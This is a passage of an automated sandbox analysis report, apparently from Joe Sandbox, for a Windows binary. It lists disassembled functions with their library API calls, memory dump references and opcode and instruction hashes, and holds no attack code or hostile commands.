                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        • Opcode ID: 94eae78fd7ce9de78eadc9981a2febc9aa24c856df59802cb3957ea5e012c663
                                        • Instruction ID: d7660887322c8fc9fec1f165140f217fb68413102053cb2c3a0d08630544da1f
                                        • Opcode Fuzzy Hash: 94eae78fd7ce9de78eadc9981a2febc9aa24c856df59802cb3957ea5e012c663
                                        • Instruction Fuzzy Hash: BCC1A330A24256DBDF25CF64C8947ED7BE4AF06300F1890B9ED09DF286C7709969CBA1
                                        Function 002720B0 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 002720B7
                                          • Part of subcall function 002780EC: __EH_prolog3.LIBCMT ref: 002780F3
                                          • Part of subcall function 00282815: __EH_prolog3.LIBCMT ref: 0028281C
                                          • Part of subcall function 002776E7: __EH_prolog3.LIBCMT ref: 002776EE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        • Opcode ID: eadad2676700bae37f14d05232e6b12dcd21c2a43335fd89a179ff8d14e586ab
                                        • Instruction ID: 11eab8d81953c028bd1f11da18e81336992af6d7f40a2f8f6d4d7c75a523738d
                                        • Opcode Fuzzy Hash: eadad2676700bae37f14d05232e6b12dcd21c2a43335fd89a179ff8d14e586ab
                                        • Instruction Fuzzy Hash: DE51E4B1A15780CEDB45DF6A84807C9BBE0BF59300F0881BADC4DDE69BDBB44254CB61
                                        Function 0027B3E1 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0027B3E8
                                          • Part of subcall function 0027F711: FindClose.KERNELBASE(00000000,000000FF,00000049,00000049,?,?,0027A684,?,?,00000000,?,?,?,?,?,?), ref: 0027F739
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CloseFindH_prolog3_
                                        • String ID:
                                        • API String ID: 2672038326-0
                                        • Opcode ID: 528f189a2e4359ec00a7dae7a29972cfc217eb77f2b1ec41724f2d7e88b3ad2f
                                        • Instruction ID: ac3a530b0b3e6d87a3a7cf398d0ae3d02f1cd074ba9d754dd71ad5585983d97f
                                        • Opcode Fuzzy Hash: 528f189a2e4359ec00a7dae7a29972cfc217eb77f2b1ec41724f2d7e88b3ad2f
                                        • Instruction Fuzzy Hash: 244158709207098FCB21DFA9C8A5BA9B7B1BF05308F54846EE15E9B352D730A865CF25
                                        Function 00272C30 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 00272C37
                                          • Part of subcall function 0028880E: __EH_prolog3.LIBCMT ref: 00288815
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3H_prolog3_
                                        • String ID:
                                        • API String ID: 3355343447-0
                                        • Opcode ID: 0a096ce126c2b669490250dd303cf32eddbc9b02b46c3dbcd012504d7292ddb8
                                        • Instruction ID: f1f4da2832ace6fdc2f567819e0e9ad8c3147dc519c791589abe5706179b1758
                                        • Opcode Fuzzy Hash: 0a096ce126c2b669490250dd303cf32eddbc9b02b46c3dbcd012504d7292ddb8
                                        • Instruction Fuzzy Hash: B331FD7592120CEACF15EFE4D8919EDBBB9EF18300F54412EF409A7251DB7099A9CF60
                                        Function 002776E7 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 002776EE
                                          • Part of subcall function 00284F2B: __EH_prolog3.LIBCMT ref: 00284F32
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        • Opcode ID: ca5c3271c0255023b14fa96754a0aaf88e89190e47516b6a933878cbbde68a7c
                                        • Instruction ID: adcfa3cee32d93d692c7fd8162678e07a765630ac70c8cb41a26b0bd6c8f1863
                                        • Opcode Fuzzy Hash: ca5c3271c0255023b14fa96754a0aaf88e89190e47516b6a933878cbbde68a7c
                                        • Instruction Fuzzy Hash: 184156B4816B85CAC725EFBAD1493CAFBE4AF64300F10995FD1AE93361D7B025048F19
                                        Function 002897A4 Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        • Opcode ID: 944ef722311744246fd98535c82687482138ca13735500a97dbba85d5360ce11
                                        • Instruction ID: 57421d5e00acb037e56ec83cca53fb556a7019a3f135d194c065013c7e8c8356
                                        • Opcode Fuzzy Hash: 944ef722311744246fd98535c82687482138ca13735500a97dbba85d5360ce11
                                        • Instruction Fuzzy Hash: B6212B75E212139FEF18AF748C49A6E7664BF01304F090139E509AB2C1D7709DA0CBE4
                                        Function 0027D771 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        • Opcode ID: 160c31bc91b46e46aaa8be5ce5f9464b1d87170dd5e939202aa50c237be78040
                                        • Instruction ID: 6edcd82f6839fb0a9aef01028483735d3b153f59159aea358d83fc2541ca8bb6
                                        • Opcode Fuzzy Hash: 160c31bc91b46e46aaa8be5ce5f9464b1d87170dd5e939202aa50c237be78040
                                        • Instruction Fuzzy Hash: 9E218376A1161A9BDB15DFE9CC81AEFB7B9AF88300F14401AE508B7241CB709E158BA5
                                        Function 0027EAF3 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3_
                                        • String ID:
                                        • API String ID: 2427045233-0
                                        • Opcode ID: 776a395c08d81e7bd672c070dec27f0e4eefa08252aee07d4fca5edfbb6bc2a0
                                        • Instruction ID: bc3f288c075d464a0dd744917c8ce6bb0240250dcda10e4407f1aaa7b124413a
                                        • Opcode Fuzzy Hash: 776a395c08d81e7bd672c070dec27f0e4eefa08252aee07d4fca5edfbb6bc2a0
                                        • Instruction Fuzzy Hash: A421F9306213059EDF20AF64C842EEE77ADBF1A758F16A489F44AA7181C7709969CB70
                                        Function 0029437D Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3_
                                        • String ID:
                                        • API String ID: 2427045233-0
                                        • Opcode ID: 147d320e6162b5312e61d2843042d9295029e5315831dec067c526e5de5b77fe
                                        • Instruction ID: f2f518f0246fe6a93d19fc09b0fae1bfe0d22d19a7d25b0390183bfb381e0f45
                                        • Opcode Fuzzy Hash: 147d320e6162b5312e61d2843042d9295029e5315831dec067c526e5de5b77fe
                                        • Instruction Fuzzy Hash: BF213E71920209DFDF08EFE4D885EEDBBB9AF48300F54401AF504E7291DA359AA6CF65
                                        Function 002A3129 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 002A1DE6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,002A00BA,00000001,00000364,?,00296C16,?,?,?,?,?,00295269,0029535E), ref: 002A1E27
                                        • _free.LIBCMT ref: 002A3195
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AllocateHeap_free
                                        • String ID:
                                        • API String ID: 614378929-0
                                        • Opcode ID: 1518d1659949646fcdc75e8b8cef56d87410417c591bed282bf1eeecc91b9cfd
                                        • Instruction ID: fdc975a5152f746860b91935cd4af996e7ba1a2f580cc84572854d3ae14c39bc
                                        • Opcode Fuzzy Hash: 1518d1659949646fcdc75e8b8cef56d87410417c591bed282bf1eeecc91b9cfd
                                        • Instruction Fuzzy Hash: 0A0126722143056BE321CF65DC8595AFBD9EB86330F25061DF19883280EE30A915CB74
                                        Function 00282815 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 0028281C
                                          • Part of subcall function 002780EC: __EH_prolog3.LIBCMT ref: 002780F3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        • Opcode ID: f885ff5aa59cb1c22c233405b24f693a2f4de212bc6ac6c2510b28eb2b625a71
                                        • Instruction ID: 1ef34f3bca611f899189d0f27e97ad64dce3a64984509dbf34d1d1692809e2b8
                                        • Opcode Fuzzy Hash: f885ff5aa59cb1c22c233405b24f693a2f4de212bc6ac6c2510b28eb2b625a71
                                        • Instruction Fuzzy Hash: 7001D271E35750CAEF11FBB8860539EBAE45F41300F10806DE44997382DE748B18DF61
                                        Function 00294300 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3_
                                        • String ID:
                                        • API String ID: 2427045233-0
                                        • Opcode ID: 7c08f6260f5cce71416e5ef3975e5c61b54b39e2b9e373d64c89d2e7cd68135e
                                        • Instruction ID: 8d191ba0873802aa25af9fe34155517322902169b228743f4331b61abbdde58f
                                        • Opcode Fuzzy Hash: 7c08f6260f5cce71416e5ef3975e5c61b54b39e2b9e373d64c89d2e7cd68135e
                                        • Instruction Fuzzy Hash: 90016D75961208EBDF01FBE4C886BDEB7BCAF14304F544065F504A6182CA389B69CF71
                                        Function 002A1DE6 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,002A00BA,00000001,00000364,?,00296C16,?,?,?,?,?,00295269,0029535E), ref: 002A1E27
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 8723cb690591ae14e409c599d94a114339db5f915bdac415be67e2565128f108
                                        • Instruction ID: 6dd1f6867ff13c0a2efeb7271383901a0cccf5303b3ef051938a3aa23e119168
                                        • Opcode Fuzzy Hash: 8723cb690591ae14e409c599d94a114339db5f915bdac415be67e2565128f108
                                        • Instruction Fuzzy Hash: 5BF0B43263512567EF215F62AE05F5B7748EF83770F254061FC08AA190CEA0D93086E4
                                        Function 002780EC Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        • Opcode ID: 6790aceb761e1d6384c5a9e96842ec0fe969cda60536d56885e23cfdefdc2a71
                                        • Instruction ID: b685b47a7fc0829b3ee21f1406de5214be991e9b2d4b1430dc7ef33220e232c3
                                        • Opcode Fuzzy Hash: 6790aceb761e1d6384c5a9e96842ec0fe969cda60536d56885e23cfdefdc2a71
                                        • Instruction Fuzzy Hash: ADF0C2B06A0710ABDA32EB258C13F8BBBD8AB85B00F404019F35C671C2DBB023218B59
                                        Function 002A040E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,0029535E,?,?,00296C16,?,?,?,?,?,00295269,0029535E,?,?,?,?), ref: 002A0440
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: ee286a33ce3b248e5c6239afe1d0c650029f5ed31de1cb9afc5b27591b7dc1f4
                                        • Instruction ID: 67b03dbaca891ea5c8158aec90e9ed3b37cca32cea43defac58c327b4007945e
                                        • Opcode Fuzzy Hash: ee286a33ce3b248e5c6239afe1d0c650029f5ed31de1cb9afc5b27591b7dc1f4
                                        • Instruction Fuzzy Hash: D1E0653113521297EA612B65AC85B5B7A48FF4B3A0F294120EE4896191CFA1DC2085A2
                                        Function 0027F711 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0027F826: __EH_prolog3_GS.LIBCMT ref: 0027F830
                                          • Part of subcall function 0027F826: FindFirstFileW.KERNELBASE(?,?,00000274,0027F733,000000FF,00000049,00000049,?,?,0027A684,?,?,00000000,?,?,?), ref: 0027F859
                                          • Part of subcall function 0027F826: FindFirstFileW.KERNEL32(?,?,?,?,?,0027D303,?,?,?,?,?,?,?,D946AC94,00000049), ref: 0027F8A4
                                          • Part of subcall function 0027F826: GetLastError.KERNEL32(?,?,?,0027D303,?,?,?,?,?,?,?,D946AC94,00000049,?,00000000), ref: 0027F902
                                        • FindClose.KERNELBASE(00000000,000000FF,00000049,00000049,?,?,0027A684,?,?,00000000,?,?,?,?,?,?), ref: 0027F739
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Find$FileFirst$CloseErrorH_prolog3_Last
                                        • String ID:
                                        • API String ID: 765066492-0
                                        • Opcode ID: 309e164cb00a41ee6ff000ed6849875090671910127a476b08eacd0217df5b8a
                                        • Instruction ID: 77941b4daee4bb1973eec97967ebda99f2e07df024b9d7e96ed3fdf5ddd9e2fb
                                        • Opcode Fuzzy Hash: 309e164cb00a41ee6ff000ed6849875090671910127a476b08eacd0217df5b8a
                                        • Instruction Fuzzy Hash: E7F0823501E760AECE616BA48904A8BBFD46F1B360F108B49F0FD121A2C2709465DB22
                                        Function 002873F8 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetThreadExecutionState.KERNEL32(00000001), ref: 0028742D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ExecutionStateThread
                                        • String ID:
                                        • API String ID: 2211380416-0
                                        • Opcode ID: a4b3a3469bb8d399c44204b05f816f8513371de7608c8befeb0e8872040f4bde
                                        • Instruction ID: 14e351a4b467cfccf4ab411245c3477f8f2fdeec6b8b219d6e0e20201c0f8650
                                        • Opcode Fuzzy Hash: a4b3a3469bb8d399c44204b05f816f8513371de7608c8befeb0e8872040f4bde
                                        • Instruction Fuzzy Hash: A1D0C20463A12022EA113B2428497FD190E4F82315F098025B408631C39E9408AA97AA
                                        Function 002711DD Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                        Download Yara Rule
                                        APIs
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00271206
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task
                                        • String ID:
                                        • API String ID: 118556049-0
                                        • Opcode ID: b6dbc1ff7d9b6923f3e65d4a1a5089bb0344b4586f9250eb3f5b27e450492f1d
                                        • Instruction ID: 8b61af632b292fbaeb3f7b2abde11a5b17b4acbe74f84b4c9708c6b79fdb7cb5
                                        • Opcode Fuzzy Hash: b6dbc1ff7d9b6923f3e65d4a1a5089bb0344b4586f9250eb3f5b27e450492f1d
                                        • Instruction Fuzzy Hash: 53D05E767226134E8B2DEF38C46682E76A46E90305320822DF42ECA682DF31CC35CB59
                                        Function 0028EB06 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GdipAlloc.GDIPLUS(00000010), ref: 0028EB0C
                                          • Part of subcall function 0028E849: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0028E86A
                                        Memory Dump Source
